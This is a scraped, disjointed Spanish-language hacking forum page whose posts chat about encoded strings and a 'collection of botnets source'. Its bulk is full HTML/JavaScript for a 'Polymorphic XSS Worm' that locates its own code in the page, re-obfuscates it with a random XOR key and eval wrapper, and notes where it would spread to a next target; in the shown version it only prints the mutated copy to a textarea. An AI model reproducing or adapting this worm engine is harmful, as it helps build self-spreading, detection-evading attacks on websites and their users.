121
Programacion General / Re:full curso de programacion completo + software
« en: Diciembre 23, 2011, 02:38:38 am »
que pasado oscuro tuve
jeje
jeje
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
jeje
Hola... r@mbyte veo que nos dejado de lado tu encriptacion....
yo vivo en /zdye6y0Xz5t8Ldr/bn5di=KRoB5di=KRjmynQTT
BASE-64 >MEGAN-35>TRIPO-5 <




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Polymorphic XSS Worm</title>
</head>
<body>
<textarea id="xssWorm" style="width:400px;height:600px;"></textarea>
<script type="text/javascript">
/* Polymorphic XSS Worm by John Leitch - john.leitch5@gmail.com */
/*worm start*/
var startToken = '/*worm start*/',
endToken = '/*worm ' + 'end*/';
function encode(code) {
var key = Math.floor(Math.random() * 256);
var packed = startToken + 'var k=' + key + ';var a=[';
for (var i = 0; i < code.length; i++) {
packed += (code.charCodeAt(i) ^ key) + ',';
}
packed += '];var d=\'\';' +
'for (var i=0;i<a.length;i++)' +
'{d+=String.fromCharCode(a[i]^k);}eval(d);' + endToken;
return packed;
}
function decode(code) {
var keyMatch = code.match(/var\sk=(\d+)/);
if (keyMatch == null) {
alert('key not found');
return;
}
var key = keyMatch[1];
var codeMatch = code.match(/var\sa=\[([\d{1,3},]+)\];/);
if (codeMatch == null) {
alert('packed code not found');
return;
}
var unpacked = '';
var codeBytes = codeMatch[1].split(',');
for (var i = 0; i < codeBytes.length; i++) {
if (!codeBytes[i]) {
continue;
}
unpacked += String.fromCharCode(codeBytes[i] ^ key);
}
return unpacked;
}
function findSelf(response) {
var x = response.indexOf(startToken) + startToken.length;
var y = response.indexOf(endToken, x);
var code = response.substring(x, y);
return code;
}
var code = findSelf(document.body.innerHTML);
if (code.indexOf('var k=') == 0) {
code = decode(code);
}
var encoded = encode(code);
// This is where the newly obfuscated worm (stored in encoded)
// is passed on to it's next target. But because we don't have a
// target we'll spit the newly obfuscated code out to a textarea.
document.getElementById('xssWorm').value = encoded;
/*worm end*/
</script>
</body>
</html>La pass esta encriptada en todos los que muestras ahi ?si esta encriptada en todo lo que dice ahi
VlyvrT6oCZyy6ywZ6nxVrA44

de que botnet es el code o es onda como una recopilacion de botne's ?na man es una recopilacion de botnets puro source